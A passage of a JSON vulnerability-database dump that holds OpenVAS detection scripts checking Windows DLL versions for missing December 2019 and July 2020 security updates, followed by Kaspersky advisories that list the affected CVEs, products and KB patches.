script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntdll.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"6.1.7601.24540\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntdll.dll\",\n file_version:dllVer, vulnerable_range:\"Less than 6.1.7601.24540\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:50", "description": "This host is missing a critical security\n update according to Microsoft KB4530715", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530715)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1471", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1477", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815864", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815864", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815864\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1483\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\", \"CVE-2019-1471\", \"CVE-2019-1477\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530715)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Windows AppX Deployment Server improperly handles junctions.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1809 for x64-based Systems\n\n - Microsoft Windows Server 2019\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530715\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\n# nb: csv wasn't updated for this information, taken based on patch\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Rdpcorets.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.17763.0\", test_version2:\"10.0.17763.913\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Rdpcorets.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.17763.0 - 10.0.17763.913\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:45", "description": "This host is missing a critical security\n update according to Microsoft KB4530684", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530684)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1483", "CVE-2019-1469", "CVE-2019-0838", "CVE-2019-1471", "CVE-2019-1467", "CVE-2019-1488", "CVE-2018-0859", "CVE-2019-1476", "CVE-2019-0860", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815683", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815683\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-0859\", \"CVE-2019-0838\", \"CVE-2019-0860\", \"CVE-2019-1453\",\n \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1467\", \"CVE-2019-1468\",\n \"CVE-2019-1469\", \"CVE-2019-1470\", \"CVE-2019-1471\", \"CVE-2019-1472\",\n \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1483\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 13:58:15 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530684)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530684\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when Windows Hyper-V on a host server fails to properly validate\n input from an authenticated user on a guest operating system.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when Microsoft Defender improperly handles specific buffers.\n\n - An error when the Windows GDI component improperly discloses the contents\n of its memory.\n\n - An error when Microsoft Windows OLE fails to properly validate user input.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain access to potentially sensitive information,\n trigger false positives for threat, escalate privileges, cause the RDP\n service on the target system to stop responding.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1903 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1903 for x64-based Systems\n\n - Microsoft Windows 10 Version 1909 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1909 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530684\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\ndllPath = smb_get_system32root();\nif(!dllPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:dllPath, file_name:\"Chakra.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_in_range(version:fileVer, test_version:\"11.0.18362.0\", test_version2:\"11.0.18362.534\")) {\n report = report_fixed_ver(file_checked:dllPath + \"\\Chakra.dll\",\n file_version:fileVer, vulnerable_range:\"11.0.18362.0 - 11.0.18362.534\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:32", "description": "This host is missing a critical security\n update according to Microsoft KB4565503", "cvss3": {}, "published": "2020-07-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4565503)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1373", "CVE-2020-1382", "CVE-2020-1367", "CVE-2020-1330", "CVE-2019-1469", "CVE-2020-1354", "CVE-2020-1438", "CVE-2020-1404", "CVE-2020-1432", "CVE-2020-1401", "CVE-2020-1372", "CVE-2020-1403", "CVE-2020-1420", "CVE-2020-1413", "CVE-2020-1392", "CVE-2020-1405", "CVE-2020-1344", "CVE-2020-1414", "CVE-2020-1433", "CVE-2020-1353", "CVE-2020-1355", "CVE-2020-1415", "CVE-2020-1436", "CVE-2020-1375", "CVE-2020-1085", "CVE-2020-1390", "CVE-2020-1358", "CVE-2020-1402", "CVE-2020-1406", "CVE-2020-1371", "CVE-2020-1352", "CVE-2020-1350", "CVE-2020-1391", "CVE-2020-1411", "CVE-2020-1393", "CVE-2020-1386", "CVE-2020-1468", "CVE-2020-1422", "CVE-2020-1370", "CVE-2020-1347", "CVE-2020-1360", "CVE-2020-1419", "CVE-2020-1333", "CVE-2020-1356", "CVE-2020-1336", "CVE-2020-1389", "CVE-2020-1418", "CVE-2020-1385", "CVE-2020-1396", "CVE-2020-1362", "CVE-2020-1431", "CVE-2020-1388", "CVE-2020-1423", "CVE-2020-1426", "CVE-2020-1397", "CVE-2020-1407", "CVE-2020-1384", "CVE-2020-1463", "CVE-2020-1427", "CVE-2020-1363", "CVE-2020-1381", "CVE-2020-1395", "CVE-2020-1267", "CVE-2020-1399", "CVE-2020-1368", "CVE-2020-1249", "CVE-2020-1430", "CVE-2020-1357", "CVE-2020-1412", "CVE-2020-1409", "CVE-2020-1462", "CVE-2020-1374", "CVE-2020-1421", "CVE-2020-1365", "CVE-2020-1435", "CVE-2020-1369", "CVE-2020-1408", "CVE-2020-1394", "CVE-2020-1437", "CVE-2020-1434", "CVE-2020-1366", "CVE-2020-1361", "CVE-2020-1400", "CVE-2020-1398", "CVE-2020-1359", "CVE-2020-1424", "CVE-2020-1428", "CVE-2020-1351", "CVE-2020-1429", "CVE-2020-1364", "CVE-2020-1387", "CVE-2020-1410"], "modified": "2020-07-20T00:00:00", "id": "OPENVAS:1361412562310817224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817224", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817224\");\n script_version(\"2020-07-20T05:00:04+0000\");\n script_cve_id(\"CVE-2019-1469\", \"CVE-2020-1085\", \"CVE-2020-1249\", \"CVE-2020-1267\",\n \"CVE-2020-1330\", \"CVE-2020-1333\", \"CVE-2020-1336\", \"CVE-2020-1344\",\n \"CVE-2020-1347\", \"CVE-2020-1350\", \"CVE-2020-1351\", \"CVE-2020-1352\",\n \"CVE-2020-1353\", \"CVE-2020-1354\", \"CVE-2020-1355\", \"CVE-2020-1356\",\n \"CVE-2020-1357\", \"CVE-2020-1358\", \"CVE-2020-1359\", \"CVE-2020-1360\",\n \"CVE-2020-1361\", \"CVE-2020-1362\", \"CVE-2020-1363\", \"CVE-2020-1364\",\n \"CVE-2020-1365\", \"CVE-2020-1366\", \"CVE-2020-1367\", \"CVE-2020-1368\",\n \"CVE-2020-1369\", \"CVE-2020-1370\", \"CVE-2020-1371\", \"CVE-2020-1372\",\n \"CVE-2020-1373\", \"CVE-2020-1374\", \"CVE-2020-1375\", \"CVE-2020-1381\",\n \"CVE-2020-1382\", \"CVE-2020-1384\", \"CVE-2020-1385\", \"CVE-2020-1386\",\n \"CVE-2020-1387\", \"CVE-2020-1388\", \"CVE-2020-1389\", \"CVE-2020-1390\",\n \"CVE-2020-1391\", \"CVE-2020-1392\", \"CVE-2020-1393\", \"CVE-2020-1394\",\n \"CVE-2020-1395\", \"CVE-2020-1396\", \"CVE-2020-1397\", \"CVE-2020-1398\",\n \"CVE-2020-1399\", \"CVE-2020-1400\", \"CVE-2020-1401\", \"CVE-2020-1402\",\n \"CVE-2020-1403\", \"CVE-2020-1404\", \"CVE-2020-1405\", \"CVE-2020-1406\",\n \"CVE-2020-1407\", \"CVE-2020-1408\", \"CVE-2020-1409\", \"CVE-2020-1410\",\n \"CVE-2020-1411\", \"CVE-2020-1412\", \"CVE-2020-1413\", \"CVE-2020-1414\",\n \"CVE-2020-1415\", \"CVE-2020-1418\", \"CVE-2020-1419\", \"CVE-2020-1420\",\n \"CVE-2020-1421\", \"CVE-2020-1422\", \"CVE-2020-1423\", \"CVE-2020-1424\",\n \"CVE-2020-1426\", \"CVE-2020-1427\", \"CVE-2020-1428\", \"CVE-2020-1429\",\n \"CVE-2020-1430\", \"CVE-2020-1431\", \"CVE-2020-1432\", \"CVE-2020-1433\",\n \"CVE-2020-1434\", \"CVE-2020-1435\", \"CVE-2020-1436\", \"CVE-2020-1437\",\n \"CVE-2020-1438\", \"CVE-2020-1462\", \"CVE-2020-1463\", \"CVE-2020-1468\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-20 05:00:04 +0000 (Mon, 20 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-15 12:33:34 +0530 (Wed, 15 Jul 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4565503)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4565503\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Windows Domain Name System servers fail to properly handle requests (SIGRed, CVE-2020-1350).\n\n - Windows System Events Broker fails to properly handle file operations.\n\n - Windows WalletService fails to properly handle objects in memory.\n\n - Windows Mobile Device Management (MDM) Diagnostics fails to\n properly handle objects in memory.\n\n - Windows Jet Database Engine fails to properly handle objects in memory.\n\n - Windows Network Connections Service fails to properly handle\n objects in memory.\n\n - SharedStream Library fails to handle objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information\n and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 2004 for 32-bit Systems\n\n - Microsoft Windows 10 Version 2004 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4565503\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0)\n exit(0);\n\ndllPath = smb_get_system32root();\nif(!dllPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:dllPath, file_name:\"Gdiplus.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_in_range(version:fileVer, test_version:\"10.0.19041.0\", test_version2:\"10.0.19041.387\")) {\n report = report_fixed_ver(file_checked:dllPath + \"\\Gdiplus.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.19041.0 - 10.0.19041.387\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-06-13T15:12:13", "description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, bypass security restrictions, gain privileges, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 \nWindows 10 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nMicrosoft Windows XP Service Pack 3 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1803 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1471>) \n[CVE-2019-1470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1470>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1472>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n[CVE-2019-1477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1477>) \n[CVE-2019-1476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1476>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1469>) \n[CVE-2019-1483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1483>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1465>) \n[CVE-2019-1489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1489>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1483](<https://vulners.com/cve/CVE-2019-1483>)7.2High \n[CVE-2019-1484](<https://vulners.com/cve/CVE-2019-1484>)6.8High \n[CVE-2019-1489](<https://vulners.com/cve/CVE-2019-1489>)5.0Critical \n[CVE-2019-1488](<https://vulners.com/cve/CVE-2019-1488>)2.1Warning \n[CVE-2019-1470](<https://vulners.com/cve/CVE-2019-1470>)4.0Warning \n[CVE-2019-1453](<https://vulners.com/cve/CVE-2019-1453>)5.0Critical \n[CVE-2019-1465](<https://vulners.com/cve/CVE-2019-1465>)4.3Warning \n[CVE-2019-1458](<https://vulners.com/cve/CVE-2019-1458>)7.2High \n[CVE-2019-1474](<https://vulners.com/cve/CVE-2019-1474>)2.1Warning \n[CVE-2019-1472](<https://vulners.com/cve/CVE-2019-1472>)2.1Warning \n[CVE-2019-1476](<https://vulners.com/cve/CVE-2019-1476>)7.2High \n[CVE-2019-1471](<https://vulners.com/cve/CVE-2019-1471>)6.5High \n[CVE-2019-1467](<https://vulners.com/cve/CVE-2019-1467>)4.3Warning \n[CVE-2019-1468](<https://vulners.com/cve/CVE-2019-1468>)9.3Critical \n[CVE-2019-1477](<https://vulners.com/cve/CVE-2019-1477>)7.2High \n[CVE-2019-1469](<https://vulners.com/cve/CVE-2019-1469>)2.1Warning \n[CVE-2019-1466](<https://vulners.com/cve/CVE-2019-1466>)4.3Warning\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530730](<http://support.microsoft.com/kb/4530730>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530698](<http://support.microsoft.com/kb/4530698>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4565503](<http://support.microsoft.com/kb/4565503>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "kaspersky", "title": "KLA11868 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1471", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1477", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1488", "CVE-2019-1489"], "modified": "2023-05-22T00:00:00", "id": "KLA11868", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11868/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T15:18:18", "description": "### *Detect date*:\n12/11/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 3 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows Server 2016 \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1803 